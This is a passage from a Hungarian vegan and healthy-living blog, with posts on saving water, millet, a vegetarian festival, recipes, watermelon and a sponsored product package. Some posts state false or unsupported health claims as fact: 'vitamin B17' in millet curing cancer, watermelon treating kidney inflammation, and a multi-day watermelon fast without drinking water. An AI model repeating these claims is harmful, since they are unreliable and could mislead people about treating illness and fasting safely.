lavor, vagy műanyag tál, amiben a zöldség/gyümölcsmosás még gyorsabban halad. Leginkább azonban az lenne jó, hogy mielőtt valaki leadja online rendelését, amit kiszállítanak egy-két napon belül oda, menjen el, nézzen körül, álljon be fél órára, lássa meg, hogy mire van ott szükség! - Szerintem . A többiről beszéljenek a képek fentebb.
Élj tudatosan, takarékoskodj a vízzel - tudatosság a hétköznapokban
2015. augusztus 26. Élj harmóniában
Múlt héten útjára indítottam egy bejegyzés sorozatot, amivel szeretnék segíteni azoknak, akik szeretnének tudatosabban élni. Célom néhány dologra rávilágítani és gyakorlatban is alkalmazható, hasznos tanácsokat adni egy környezettudatosabb életmód kialakításához. (a bevezető bejegyzést itt olvashatod) A mai kor emberének életmódja úgy van kialakítva, hogy nem veszi figyelembe sem a környezetre gyakorolt hatásokat, sem saját magunk egészségügyi, életminőségbeli és gazdasági, pénzügyi helyzetére gyakorolt hatásokat. A legtöbb ember élete, tudtán kívül, vagy tudtával nagyon pazarló, környezetkárosító és önkárosító. Ugyan az életmódunk hatásairól teljesen pontos képet még nem láthatunk - hiszen az eredmény majd 30-40 év múlva lesz egyértelmű, de már most is látszik, hogy komoly gond van és lesz. Egyre több a helytelen életmód következtében kialakult betegség és egyre több szakember hívja fel a figyelmet, hogy a Föld ilyen mértékű kihasználása és szennyezése milyen katasztrófákat von maga után. Háztartások vízfelhasználása A föld édesvíz készlete korlátozott mennyiségben áll rendelkezésre és a modern kori életformával nagyon gyors ütemben használjuk fel ezt a vízkészletet - főzés, mosás, fürdés, wc használat, mosogatás, etc. Ugyan elsődlegesen a mezőgazdaság és az ipar, ami jelentősebb mennyiségű vizet használ el, de nagyon fontos tudatosan alakítani a saját vízfogyasztásunkat. Abban hiszek, hogy azzal tehetünk a legtöbbet, hogy mi magunk megpróbáljuk helyesen csinálni a dolgokat. A mellékelt ábrán láthatod, hogy a háztartások vízfelhasználása, hogyan alakul. Sajnos a wc használattal pazaroljuk, el a legtöbb vizet. A kád helyett válaszd a zuhanyozást. Nem csak sokkal higiénikusabb, de takarékosabb is (kád víz 160 l, zuhanyozás 30-60 l). Amikor éppen nem használsz vizet, pl szappant használsz, fogat mosol, addig zárd el a vizet. Ne állj a zuhany alatt hosszasan csak a legszükségesebb minimum időt töltsd el. Válts egykaros keverőcsapra, mert kevesebb víz folyik el feleslegesen, mire beállítod a megfelelő hőmérsékletet. Szerelj be olyan megoldást aminek a segítségével csökkenthető a kifolyó víz mennyisége (perlátor), víztakarékos zuhanyfej, etc. Mosogatás közbe ne folyasd folyamatosan a vizet, egyszerre végezd az öblítést. Csak akkor használj nagyon meleg vizet, ha az valóban indokolt. A mosogatógépet és a mosógépet, csak akkor indítsd el ha tele van. Két tányér vagy két ruhadarab tisztításához ezek a gépek ugyanannyi vizet és áramot használnak el, mintha tele lenne a gép. Ha csöpög a csap, mielőbb javítsd meg! Az ilyen munkákat soha ne halogasd, mert egy hónap alatt egy kádnyi vizet veszíthetsz el akár egy csöpögő csap miatt. Akkor nyisd ki a csapot amikor használod a vizet és csak annyi ideig folyasd, ameddig szükséges. Ha kinyitod a csapot és üresjáratban van, nagyon sok vizet feleslegesen folyatsz el. A WC öblítés sajnos Magyarországon és a legtöbb helyen ivóvízzel történik - ami nagyon pazarló megoldás. Ha teheted állj át más megoldásra pl. esővíz felhasználásra. Vagy próbálj víztakarékos tartályt választani vagy tartály nélküli megoldást, mert akkor csak annyi vizet használsz el amennyire éppen szükség van. Ne használj ivóvizet az öntözéshez. Gyűjtsd az eső vizet, így olcsóbb és környezetbarát lesz a kerti locsolás, arról nem is beszélve, hogy a kerted kevesebb klórt és egyéb víz tisztításához használt vegyületet kap majd:).
Ezért egyél kölest.... A köles jótékony hatásai
2015. augusztus 22. Éltető ételek
Én mintegy 4 évvel ezelőtt azt sem tudtam, hogy "mi fán terem" a köles. Gyerekkoromban nem találkoztam vele, szűkebb és bővebb ismeretségi körömben sem volt ismert. Pedig ilyen univerzális gabona nem sok van. Ma már szinte minden nap az asztalra kerül valamilyen formában. De azért érdekes, hogy a baráti köröm még most sem igazán ismeri. Nemrég a boltban vásároltam, és a pénztáros megkérdezte, hogy mit szoktam készíteni belőle. Pár szóban elmondtam neki, remélem Ő is kipróbálta már azóta. Egy időben a zöldségesnél vettem, de már ő sem tart, mert nincs rá igény. Sajnos nem ismerik eléggé az emberek, és a közétkeztetésben sincs jelen! Az is a baj szerintem, hogy nem lehet akárhol megvásárolni, sajnos még nem tartozik az alapvető élelmiszerek közé. Többnyire bioboltokban kapható, ott kell keresni. Na ezzel az írással az a célom, hogy merjük használni a kölest, mert sokoldalú, tápláló, egészséges és finom. A növényről pár szóban A köles igen termőképes. Rövid tenyészidejű, egy nyáron egy kölesmagból 30-40 ezer magocska is képes kifejlődni, mert többször is hoz termést. 60-90 cm magas, egynyári fű; a levele lándzsás, szőrös. Virágzata már a virágzás előtt bókoló, oldalra hajló. Füzérkéje egyvirágú, szálkátlan. A köles múltja, jelene és jövője A köles egy ősi gabona. Mintegy tízezer éves múltra tekint vissza, hazánkban is ismert, és gyakran fogyasztott gabona volt. A Kárpát-medencében letelepedő magyarok is termesztették a kölest. A családi menü tudományos megközelítésben 4.1 részében írtam arról, hogy a 16. századi szakácskönyv is említést tesz a köleskása elkészítésére. Földünkön a népesség mintegy 1/3-a ma is alapélelmiszerként fogyasztja a kölest. Csak nem a civilizált lakosság, hanem a fejletlen országok (Afrika, Ázsia, India) lakossága. Sajnos... A jövője? Remélhetőleg felfelé ível. A szakdolgozatomban a táplálkozás és a betegségek összefüggéseit kerestem. Kérdőív alapján statisztikát készítettem arra vonatkozóan, hogy milyen gabonákat ismernek és fogyasztanak az emberek. A megkérdezettek csupán 20%-a ismeri és fogyasztja rendszeresen a kölest. Viszont az internetes válaszadók nagyobb számban ismerték a kölest, mint a helyben gyűjtött válaszadók. Úgyhogy fontos, hogy terjesszük az "igét", hívjuk fel ismerőseink figyelmét a kölesre, adjunk nekik tippeket, hogy hogyan használják és fogyasszák. Egyébként úgy veszem észre, hogy egyre több kölesrecept jelenik meg a világhálón. Miért együnk rendszeresen kölest? Több ősi táplálkozási irányzat, így többek között a makrobiotika és az ayurveda is fogyasztja a kölest. Jótékonyan hat a gyomorra, a lép-hasnyálmirigyre, és erősíti a vesét is. Vese- és hólyaggyulladás esetén rendszeres fogyasztása javasolt, a lép gyógyszereként ismerik. Fantasztikus lúgosító hatása van , így a mai civilizációs ártalmak ellen - mint például az elsavasosás, köszvény - bevethető. Gátolja a szájban lévő baktériumok szaporodását, gombaölő - így kiválóan beilleszthető a candida diétába is. Továbbá hasznos hasmenés, hányás, emésztési zavar és diabetesz esetén. Enyhíti a várandósok reggeli rosszullétét. Könnyen emészthető, nem idéz elő gázképződést. Melegítő hatású. Kovasav (szilícium) tartalma révén jótékonyan hat a bőrre, a hajat fényessé, a fogakat, körmöket erőssé teszi. Kovasav nélkül egyetlen élő anyag sem tudna létezni. Mésszel együtt elsősorban támasztó funkciót tölt be, a kovasav biztosítja a rugalmasságot, a mész pedig a szilárdságot. Magas szilícium tartalma a kötőszövetekre, porcokra, csontokra hat jótékonyan. Megakadályozza és megállítja az érelmeszesedést , és visszaadja az elváltozott erek rugalmasságát, normalizálja ezzel a vérnyomást is. Rosttartalma valamivel alacsonyabb a búzáénál, viszont gazdag B-vitaminokban és nyomelemekben. A köles egyszerre képes salakanyagként kiválasztani a pangó ásványi anyagokat a szervezetből, és az ásványi anyag veszteséget kiegyenlíteni. Tartalmaz fluort, ként, foszfort, vasat, kálciumot, magnéziumot, káliumot, cinket, valamint béta karotint is, amelyet a máj alakít át A-vitaminná. A kálium a szívizom működését szabályozza, míg a magnézium és a foszfor a szellemi munkánál a fáradtság ellen nyújt védelmet. A kovasav a fluorral együtt hatva gondoskodik az egészséges fogakról és szilárd körmökről. B17-vitamin tartalma révén a rákmegelőző és gyógyító étrendek fontos része. Fehérjetartalma 10-15%. Gluténmentes , ezért az erre érzékenyek is fogyaszthatják. Az ideális testsúly elérésében nagy segítségünkre vannak a kölesben lévő vízoldékony rostok, mivel fokozzák a teltségérzetet, csökkentik a tápanyag-felszívódás mértékét, és lassítják a gyomor ürülési sebességét. Cukorbetegség esetén a rostok a szénhidrátok felszívódását is mérsékelik. Barnaköles/vadköles , az ízületek karbantartója. Az aranykölest azért kell hántolni, mert kemény kovasav tartalmú héja étkezésre alkalmatlan. Viszont a vadkölest nem hántolják, ezért jóval magasabb beltartalmi értékkel bír. Mint köztudott, az ásványi anyagok és a nyomelemek a magok külső rétegeiben halmozódnak fel, és azok a hántolással a tizedére csökkennek. Rosttartalma védi a bélrendszert, szerepet kaphat a méreganyagok megkötésében is. Értékes ásványi anyagaival teljes értékű gyógyító nyers táplálék az ízületeket és mozgásrendszert érintő problémák esetében , különösen a gerincoszlopnál és kis- és nagyízületek artrózisainál. Kiemelten segíti a porcok, porckorongok védelmét, regenerációját. A tapasztalatok szerint napi 2-3 teáskanálnyi nyers vadköles liszt fogyasztásával már néhány (6-8) hét után tapasztalható az ízületi fájdalmak és a gyulladás csökkenése. Általában egy év szükséges a porcok látható javulásához, másfél-két évig történő használat mellett pedig a porcok, porckorongok regenerációja is létrejöhet. A férjem reggeli kásájának elengedhetetlen alkotóeleme ez a vadköles. Sportolóknak szerintem szintén elengedhetetlen. A köles héjából párna készül, amely ősi tapasztalatok szerint nyugtató hatású. Használata allergiásoknak is ajánlott, mivel az élősködők nem tudnak benne megtelepedni. Remélem kedvet kaptatok arra, hogy kipróbáljátok ezt a csodás gabonát. Minden nőnek - na jó, férfinak is - napi szinten kellene legalább egy evőkanál kölest ennie ahhoz, hogy megóvja arcbőrének szépségét, és ne keletkezzenek ráncok, illetve a már meglévők kisimuljanak. Ezt mindenképpen érdemes kipróbálni!
Vegetáriánus Fesztivál + Vegagyerek workshop
2015. augusztus 17. Zizi kalandjai
Idén is megrendezésre kerül a Vegetáriánus Fesztivál, immár 19. alkalommal. Augusztus utolsó hétvégéjén a hagyományokhoz híven az Egészség-Vár Alapítvány sok színes és érdekes programmal, fellépőkkel, kiállítókkal, és finomságokkal vár minden kedves érdeklődőt. Akárcsak az elmúlt években, idén is a rendezvény teljesen ingyenes. Időpont: 2015. augusztus 29-30. Helyszín: Kőrösi Csoma Sándor Kőbányai Kulturális Központ, 1105 Budapest, Szent László tér 7-14. A fesztivál táplálkozási szakemberek előadásait, csoportos jógát, csakratisztító mantrameditációt, csoportos hangfürdőt, vegetáriánus ételkóstolókat, öko- és bio szemléletű termék-bemutatókat kínál - nem csak vegetáriánusoknak és vegánoknak! Az idei szakmai előadásokon, workshopokon többek között szó lesz a vegán életmódról, a nyers táplálkozásról, a vegán izomépítésről és a holisztikus egészségmegőrzésről. A programokból kiemelnék néhányat, amelyeket nagyon érdekesnek tartok és én szívesen meghallgatnám őket: – Sebestyén Szilvia: Miért fontos az egészséges, jól működő emésztőrendszer? – Nagy Szaffina és Nagy Károly: Izomépítés vegán módra – Varga Sándor: A tenger vega gyümölcsei – az algák! – Lénárt Gitta: Enzimtáplálkozás - nyers ételekkel – Váradi Tibor: Vegetarianizmus a sav-bázis egyensúly tükrében – Tóth Gábor: Vegán gyógyulások – avagy nagyszerű tapasztalataink a növényi alapú étrend hatásairól Magyarországon az elmúlt 20 évben – Kovács Zoltán: Vegán táplálkozás a gyakorlatban Augusztus 30-án 11-12 óráig a fesztiválon (Workshop 2.) találkozhattok velem egy beszélgetés erejéig. A téma nem meglepő módon: Mit eszik a vegagyerek? Sok szeretettel várok mindenkit, akit érdekel ez a téma!
Vegán paella
2015. augusztus 3. Éltető ételek
A paella egy jellegzetes spanyol étel, melyet legtöbbször hallal (vagy más hússal) készítenek. Egyszerű és tökéletes ebéd vagy vacsora. Eredetileg fedő nélkül készül egy nagy serpenyőben, de mivel én barnarizst használtam, így mindenképp fedővel készítettem. A sárga színét a sáfrány adja, de mivel ez a fűszer "aranyárban" van, ezért én sáfrányos szeklicét "magyar sáfrányt" használtam. Hozzávalók: 1 csésze barnarizs (én a DM új Bio termékcsaládját nagyon megkedveltem, a barnarizse pedig kifejezetten finom)1/2 csésze zöldborsó1/3 csésze csicseriborsó éjszakára beáztatva20 dkg gomba1 evőkanál kókuszolaj1 vöröshagyma3 gerezd fokhagyma1 kápia paprika - 1 zöldpaprika - 1 paradicsom - 1 marék spenót - 1 mindenmentes zöldségleveskocka - 1/2 kávéskanál pirospaprika - 1/2 kávéskanál sáfrányos szeklice - himalája só, bors Elkészítése: A kókuszolajon pirítsuk meg (kb. 3-5 perc) a megtisztított, és negyedekre vágott gombát. Sózzuk, borsozzuk, reszeljünk bele 1 fokhagymát is.Szedjük ki a serpenyőből, majd dobjuk bele az apró kockára vágott hagymát. Dinszteljük pár percig, majd reszeljük hozzá a fokhagymát is.A spenótot tépkedjük kis darabokra, a paprikákat és a paradicsomot vágjuk fel szintén kisebb darabokra. Az átmosott rizs is mehet hozzá.Pirítsuk együtt pár percig.Ezután a beáztatott csicseriborsót adjuk hozzá, és öntsük fel 2,5 csésze vízzel.Fűszerezzük, fedjük le, és főzzük fél órát úgy, hogy nem keverjük meg.Ezután adjuk hozzá a zöldborsót és a pirított gombát.Főzzük további fél órát, csak az utolsó 10 percben kevergethetjük.
Pikk-pakk kész, puha áfonyás szelet és a nagyszabású áfonya fesztiválok (gluténmentes, laktózmentes, tojásmentes, vegán)
pikk-pakk kész, puha áfonyás szelet (mindenmentes, vegán) A világ számos országában a fekete áfonya az egyik legnépszerűbb, leggyakrabban fogyasztott gyümölcs. Ázsiától Amerikáig, Nyugat-európán át mindenhol kedvenc alapanyag a konyhában, és gyakran fogyasztott bogyós gyümölcs már több száz éve. Magyarország nem tartozik ezen országok közé (sajnos ez magas árának is köszönhető:-( ), pedig a Hupikék Törpikék által is kedvelt kék csoda bogyó, rendkívül értékes tápanyagtartalommal bír. Méretében kicsi, de rendkívül ízletes, és kevés olyan étel van, amely ennyire egészséges lenne, mint a fekete áfonya. ;-) pikk-pakk kész, puha áfonyás szelet (mindenmentes, vegán) Arról, hogy milyen egészségügyi előnyei vannak a rendszeres áfonya fogyasztásnak, majd egy legközelebbi posztban térnék ki. Most inkább ezt a számunkra kissé idegen, a Világ számára pedig nagyon is ismert, sötétkék bogyót mutatnám be nektek egy másik oldaláról, ami nem a főzés, sütés. Miről is beszélek? A nagyszabású fekete áfonya ünnepekről, fesztiválokról, melyeket a Világ különböző pontjain (főleg Amerikában) rendeznek meg minden évben nagy szeretettel. Ezeken, az akár több napos fesztiválokon a főszerep a fekete áfonyáé! :-) Blueberry Hank at the Marshall County Blueberry Parade Az utak mentén fekete áfonya árusok kínálják finomabbnál finomabb terméseiket, jelmezes felvonulások, családi programok, koncertek, fellépők, játékok kicsiknek és nagyoknak, különböző egyéni és csapat versenyek, mulatságok szórakoztatják a kilátogatókat, és mindez a fekete áfonya bűvöletében! :-) A fesztiválozók a nyers, bio gazdaságokból származó fekete áfonya szemekből csipegetnek; vagy ha nassolni támad kedvük, ízletes áfonyás süteményekből válogatnak; az éhezők pedig sült húsokból lakomázna, melyek természetesen áfonyás mártással készülnek. ;-) Evés után pedig jól esik egyet inni, ezért a gyerekek a Hupikék Törpikékből is jól ismert áfonya szörpökből szürcsölgetnek, míg a felnőttek az áfonyabort kóstolgatják. ;-) A vidám, jelmezes felvonulások, a fesztiválok fénypontjai a fekete áfonya királynők megválasztása, és azok bemutatása a közönség előtt. A fergeteges hangulat, a szórakoztató programok, az áfonya fesztivál pedig egy nagyszabású tüzijátékkal zárul minden évben! ;-) A Berry wonderful FestNem tudom ti, hogy vagytok vele, de én nagyon szeretem a gasztronómiai témájú fesztiválokat! :-) Annyira meghozták a kedvemet ezek a külföldi fekete áfonya fesztiválok, hogy gyorsan utána is néztem, Magyarországon szerveznek-e hasonlót? Elég sok gasztronómiai témájú fesztivál van Magyarországon is, de áfonya fesztivált legközelebb Vármezőn (Románia) találtam. 2013-ban ünnepelte a 10. Áfonyafesztivált Vármező, azonban sajnos ennél frissebb híreket nem láttam az Interneten, amiből arra merek következtetni, hogy a 10.volt az utolsó, amit megszerveztek. (Itt jegyezném meg zárójelben, hogy akinek tudomása van róla, hogy még mindig megrendezésre kerül a vármezői Áfonyafesztivál, akkor az legyen szíves jelezze nekünk, hátha valaki szívesen részt venne a programon! ;-) ) pikk-pakk kész, puha áfonyás szelet (mindenmentes, vegán) És akkor térjünk át a receptre. Ritkán készítek egyszerű kevert süteményeket, de egyik este nagyon megkívántam valami gyors, édes szénhidrát bombát, fehér tésztával. Másnap természetesen fakanalat is ragadtam, megnéztem mi van itthon, és ez a pikk-pakk kész, gyorsan elkészíthető, mindenmentes, könnyű és puha, nagyon finom áfonyás sütemény lett belőle. Tökéletes nassolni való egy jó kávé vagy tea mellé, de még egy bögre meleg növényi tejes kakaót is el tudok képzelni hozzá. :-) HOZZÁVALÓK : (17 cm-es tortaformához) - 3/4 bögre rizsliszt - 3/4 bögre mandulaliszt (darált mandula) - 1 citrom reszelt héja (kezeletlen, bio citrom) - 1/2 tk szódabikarbóna - 3 ek kókusz olaj (olvasztott kókusz zsír) - 1/4 bögre mandula tej (vagy bármilyen más növényi tej) - bő 1/2 bögre natúr laktózmentes joghurt (pl.: szója joghurt) - 1/2 bögre eritrit (más édesítő is megfelel) - csipet Himalája só - 1 bögre fekete áfonya (vagy más tetszés szerinti gyümölcs) - 1 ek vanília kivonat - opcionálisan Az áfonya helyett természetesen használhattok más idény gyümölcsöt is pl.: meggyet, cseresznyét, barackot, szedret, szőlőt, ribizlit stb. ELKÉSZÍTÉS: Mint minden egyszerű kevert tésztát, ezt is nagyon könnyedén el lehet készíteni, mindenféle konyhai jártasság nélkül. :-) Előveszünk két műanyag keverőtálat. Az egyikbe alaposan összekeverjük a folyékony hozzávalókat, a másikba a szilárd alapanyagokat. Majd fogjuk és a két tál tartalmát is összeöntjük. Addig keverjük alaposan a fakanállal, míg teljesen egynemű, csomómentes tésztát kapunk. A megmosott fekete áfonya szemek felét a tésztába keverjük. Elővesszük a torta formánkat (én 17cm-eset használtam), kibéleljük sütőpapírral, (vagy csak kikenjük zsiradékkal és liszttel), közben pedig előmelegítjük a sütőt 180 °C -ra. A torta formába öntjük a nyers tésztát, majd a tetejére szórjuk a maradék fekete áfonyát. Betesszük az előmelegített sütőbe, és kb.40 perc alatt készre sütjük. Miután már az egész lakást átjárja a finom sütemény illat, tűpróba után kivehetjük a megsült tésztát. Hagyjunk kihűlni egy kicsit, mielőtt eltávolítanánk a formából. Ha valaki a kávé, tea vagy kakaó helyett szeretne a sütemény mellé diétás és ízletes öntetet, turmixoljon le egy érett banán, egy fél citrom levével, és fogyassza ezzel a citromos banános öntettel a könnyed áfonyás szeletet. pikk-pakk kész, puha áfonyás szelet (mindenmentes, vegán) Bűntudatmentes nassolást kívánunk! ;-) Megjegyzés1: Ritkán készítek "sült gyümölcsöket", hisz nem jó hőkezelni őket, mert elvesztik vitamin tartalmuk nagy részét. :-( A helyes ételtársítás szabályainak sem feleltem meg ezúttal, mert a gyorsan felszívódó gyümölcsöt nem szabad semmi mással keverni, együtt fogyasztani, mert megakad a lassabban emészthető étellel a gyomorban, és rothadásnak indul a gyümölcs, ami kellemetlen tüneteket okozhat, és elégtelen emésztéshez vezethet. Néha én is szemet húnyok a szabályok felett, és csak átadom magam az élvezetnek! :-) Persze azért a glutén- és laktózmentességre, a könnyebben emészthető alapanyagokra ebben a receptben is figyeltem! ;-) (Bővebben erről a témáról Angela Maria Marui - Helyes ételtársítás c. könyvében olvashattok.) Megjegyzés2: Ha valaki Nagykanizsa környékén lakik, akkor szeretettel ajánlom az Áfonyakert Szedd magad! Akcióját, ahol a piaci árnál olcsóbban, vidám társaságban, egy jó kis családi élménnyel gazdagabban juthat bio minőségű fekete áfonyához minden évben! :-) pikk-pakk kész, puha áfonyás szelet (mindenmentes, vegán)
Miért együnk görögdinnyét?
2015. július 25. Éltető ételek
Minden évben nagyon várom a júliust-augusztust, hogy igazán finom, magyar görögdinnyét ehessek. Mivel csak bő 1 hónapunk van arra, hogy jól belakjunk belőle, ezért nem tétlenkedek, napi szinten "gurítom haza" ezt a finomságot. De vajon tudjuk azt, hogy miért is jó görögdinnyét enni? A tökfélék családjába tartozó görögdinnye Afrikában őshonos, a sivatagos területeken kiváló vízforrásnak minősül. Már 5000 évvel ezelőtt Egyiptomban termesztették, még a fáraók sírjába is bekerült. A 10. században eljutott Kínába is, ahol annyira meghonosodott, hogy jelenleg a legnagyobb dinnyetermelő ország. A görögdinnye népszerűsége az egész világon töretlen, lehet világoszöld-csíkos vagy sötétzöld; piros vagy akár sárga húsú is. Formája gömbölyű vagy hosszúkás, de a könnyebb szállíthatóság miatt kockába növesztett dinnyét is termesztenek. Hogyan hat a szervezetünkre? Hűtő hatása révén megszünteti a meleg, a nyári hőség okozta kellemetlenségeket.Remek vízhajtó és salaktalanító , jól átmossa a vesét és a húgyutakat, ezáltal vesegyulladás és húgycsőgyulladás kezelésére is alkalmas. Szomjúság ellen, vizelési nehézség, ödéma, köszvény, ízületi gyulladás esetén is együk minél több görögdinnyét. Mivel 90%-ban vízből áll, jól átmossa és méregteleníti a szervezetet , a vért és a beleket tisztítja.A magját se dobjuk el , főzhetünk belőle teát, vagy kiszáríthatjuk, és megdarálva ehetjük (vagy csak alaposan rágjuk össze). Tágítja a hajszálereket, ezáltal leviszi a magas vérnyomást. Valamint a húsához hasonlóan nagyon jó hatással van a húgyúti és veseproblémákra is.A héja is fogyasztható, rengeteg benne a szilícium; a zöld része pedig klorofillban gazdag. Diabétesz és magas vérnyomás esetén mindenképp fogyasszuk úgy, hogy a kipréseljük a levét, és naponta kisebb adagokban iszunk belőle. De kiszárítva a száraz héjából tea is főzhető.Antioxidáns hatása is ismert, ugyanis béta-karotint tartalmaz. A likopinnak köszönheti piros színét, - a paradicsom vetélytársa - mely közismerten szabagyökmegkötő hatású, a daganatos betegségek megelőzésében is szerepet játszik. Hogyan együk? Mindig csak önmagában! Ne együnk hozzá kenyeret, és más gyümölcsöt se! Ha így teszünk, akkor nagyon könnyen emésztődik, nem lesz erjedés a következménye. Érdemes hetente legalább 1-szer dinnyenapot tartani. Jól tisztítja a méregtelenítő szerveket, a vesét, a májat és az ereket. Ha rászánod magadat erre, akkor CSAK dinnyét egyél egész nap, de még vizet sem kell innod. Ha legalább 3 napig tartod ezt a dinnyeevést, akkor ezzel egy kis méregtelenítést is csináltál. Utána csak lassan, és fokozatosan vezesd vissza a főtt ételeket, és semmiképp ne hússal vagy tejtermékkel kezd azt.
7. blogszületésnap és kovászos uborka
2008. július 16.-án volt az első bejegyzés, most néztem. És talán az első év, hogy a dátumforduló előtt eszembe jutott a dolog, de csak azért, mert visszanéztem néhány oldalt. Valamit kerestem. Bejegyeztem ezt a két sort még akkor, azután úgy ahogy van el is feledkeztem róla. Múlt héten Nagyúton tanyáztunk, történt velünk egy csomó érdekes dolog, ugyan 3 nap is bekapcsoltam a gépet, de keveset és teljesen másra fordítottam az időt. Ábel szempontjából merő izgalom volt a hét, bálázni ment a Papával, felült a kombájnra, felmentünk Mátraházára, és ami a legfontosabb, némelyik kismacska időnként megadta magát, és hagyta, hogy megfogja, meggyömöszölje, simogassa... A kis vörössel órákig eljátszott volna úgy, hogy belerakta a nagy ládába, bemászott utána, és ott simogatta, illetve magyarázott neki. Anya sem unatkozott ezalatt. Tekerte a biciklit a traktor, meg a kombájn után, hogy a visszafelé legyen aki hozza a kis uraságot, főzőcskézett, szedett-tett-vett ezt azt, öregezett, nagyinak a szülinapjára tortát sütött, összességében semmi komolyabbat nem alkotott, csak bosszankodott estére, hogy elszaladt az idő, és semmi nyoma, aztán a gyerekkel együtt mély álomba zuhant altatás közben. :) Mindezek ellenére valahogy feltöltött. Az aratást nézni mindig különlegesen elégedett érzés, olyan megnyugtató. Pedig zúg a gép, száll a por, éget a nap, és ennek ellenére mosolyogsz. Még azok is, akik a gépen állva zsákolnak, ha épp a kis kombájnról van szó. Azután majd jön a nagy tengerimalac (bálázó a Férj szóhasználatában) megeszi a füvet, és kijön a kompakt csomag. :) És míg ez történik a melegben kovászolódik az uborka. Nem törődve semmivel vígan opálosodik a vize, erősödik a szaga, míglen megérik, hogy a munkások jóízűen megegyék az ebédhez. Az eltevése egyszerű, mint a faék. Vizet forralsz, és langyosra hűtöd. Uborkákat tisztítasz a rárakódott piszoktól, esetleg ha bonyolítani szeretnéd, tormát is pucolsz. Öreg kaprot gyűrsz a nagy üveg aljára, rárakod az uborkákat kb. kétharmadig, ha túl nagyok, bevagdosod őket. A langyos vízbe másfél kanál kősót keversz. Az uborkák tetejére megy két vékony szelet torma, némi kapor, majd rá a víz. A tetejére vékony tüllbe (nekem Csepelen csak csipketerítőm volt, az is megfelelt) keverve teljes őrlésű kenyér darab. Állítólag az öreg krumpli is jó, de még sosem próbáltam. Végül lefedjük egy kistányérral, és meleg helyen 4-5 napig érleljük. Tudom, hogy jobb az üveg, de az sem volt, csak sok uborka. Még a sima kovászos káposzta csiklandozza a gondolataimat, és Mijemaja kaukázusi kovászos káposztája, de azok már biztosan augusztusra maradnak...
Ajándékcsomagunk érkezett a Természet Áldásától!
2015. július 16. Mindennapi ételeink
Szeretnék nektek egy nagyon korrekt, gyors, segítőkész és hihetetlenül jó dolgokat forgalmazó céget bemutatni. Biztosan emlékeztek a legutóbbi facebook nyereményjátékunkra, melyen gyümölcsleveket lehetett nyerni a Természet Áldása jóvoltából. Nos, mi egyéb termékeiket is kóstoltuk és nyugodt szívvel tudom ajánlani őket. Sok mindent forgalmaznak, többek között mi az alábbi termékeket kaptuk most kézhez: Kókuszolaj: Mi az itteni bioboltban is ezt szoktuk vásárolni. A kókuszolajról majd írok egy külön bejegyzést, hogy miért ebben és ezzel sütök, illetve mikhez szoktam használni. Most ajánlanék egy süteményt, amelybe ezt kevertem (vaj helyettesítésére kiváló), ill. egy sós pástétomot is. Ez a kedvenc pástétomunk, mindig van itthon. :-) Vöröslencse: Azért szeretjük, mert hamarabb elkészül (nem kell beáztatni, ill. könnyebben meg is fő), mint a hagyományos barna lencse és nem fúj fel annyira, így Fanninak is nyugodtan adhatom. Bár ő a barna lencsét is szereti, pástétomként, levesként vagy főzelékként elkészítve, csak az jobban megterheli az emésztését. A lencse javítja az anyagcserét, növeli az immunitást, normalizálja a vizeletkiválasztó rendszer működését, szinte az egész napi szükséges folsavadag megtalálható benne, omega 3 és omega 6 zsírsavakat, magnéziumot, vasat, triptofán nevű aminosavat tartalmaz (ez utóbb idegnyugtató, segít az elalvásban, depressziós napokon). emellett található benne isoflavon is, mely megmarad a főzés után. Ez a mellrák megelőzésében játszik fontos szerepet. A vöröslencséből szoktam készíteni krémlevest, pástétomot és fasírtot is. Jázminrizs: Thaiföldről származik, illatos rizsnek is nevezik. Pikáns, finom aromája van, könnyen puhul. Én szoktam köretként, süteményként, tejberizsként, rakott ételként és fasírtként is elkészíteni. Bulgur: Kevésbé ismert gabona, amellyel színessé tehetjük étkezésünket. Szuperköretnek is szokták nevezni, nem véletlen. Rostokban, vitaminokban, ásványi anyagokban gazdag, B-vitamin és vas is jócskán van benne. Ráadásul alacsonyabb a glikémiás indexe, mint a rizsé, tehát diétához is nagyon ajánlott. Szoktam belőle készíteni rakott ételt, fasírtot, köretet, salátát, édességet is. Napraforgómag: Kezelhetjük vele a székrekedést és vizelethajtó tulajdonsága is van. A folsavban gazdag mag pedig egy igencsak értékes tápanyagforrás a női szervezet számára. Sok benne a jó zsír, antioxidáns, E-vitamin, szelén és réz is. Csökkenti a sejtkárosodással járó betegségek kialakulását , megvéd a szívbetegségtől és a ráktól is. A napraforgómag nyugtatja az agyat is, hiszen a benne levő tripofán megnöveli az agyban levő szterotonin szintet. Energikussá teszi a szervezetet, és javítja a látást is. A vegán konyhában alapvető élelmiszer: vegán tejfölt készíthetünk belőle, ill. finom pástétomok alapja lehet. Barna lenmag: Koleszterincsökkentő hatása miatt ér-és szívbetegségben szenvedőknek kifejezetten ajánlott a fogyasztása, székrekedés esetén szabályozza az emésztést, omega 3 tartalma kiemelkedően magas. Külsőleg is gyógyításra használják: borogatásként enyhítheti a gennyes pattanásokat. Vegán konyhában szintén elengedhetetlen alapanyag, tojás helyettesítésére használjuk. 1 ek. lenmagőrlemény és ugyanannyi víz keveréke egy tojásnak felel meg. Így kerülhet süteménybe, fasírtba. Zabpehely: A zab az egyik legrégebben termesztett gabonaféle, több tucat faja ismert. Zabból főtt kását először a görögök készítettek és fogyasztottak. A zabpehely kevés kalóriát tartalmaz, viszont rost- fehérjetartalma magas. Jelentős mennyiségben tartalmaz B1- vitamint, de számottevő B2-, B3-, B6- és K-vitamin tartalma is. Ásványi anyagok közül kiemelkedő mangán-, magnézium-, réz- és foszfortartalma, de gazdag kalciumban, vasban és cinkben is. A zabpehely rendszeres fogyasztása javíthatja az emésztést és a csontok, valamint erek általános állapotát. Nálam sokszor fasírt készül belőle, sokszor palacsinta, vagy édes keksz. Mák: Egy-egy mákkal dúsított ételből alkalmanként nem nagy mennyiséget eszünk, ennek ellenére értékes tápanyagtartalmú élelmiszer. A vitaminok közül értékes B1-, B6-, B2-, niacinforrás.. Az ásványi anyagok közül pedig nagyobb mennyiségben kálciumot, cinket, mangánt, rezet, vasat, foszfort, káliumot és magnéziumot tartalmaz. Az orvostudomány széles körben alkalmazza gyógyszerek alkotórészeként, így köhögéscsillapításra, görcsoldásra, vagy súlyos betegségekben a végső fájdalom csillapítására. Vegán mákos sütemény, kölespuding, vagy mákos sós rúd készül belőle. Világos nádcukor: Természetes cukor, a szervezet sokkal jobban fel tudja dolgozni, mint a fehér cukrot, előállítása nem vegyi eljárással zajlik, Frissen aratott, hagyományosan művelt cukornádból nyerik. A boltokban 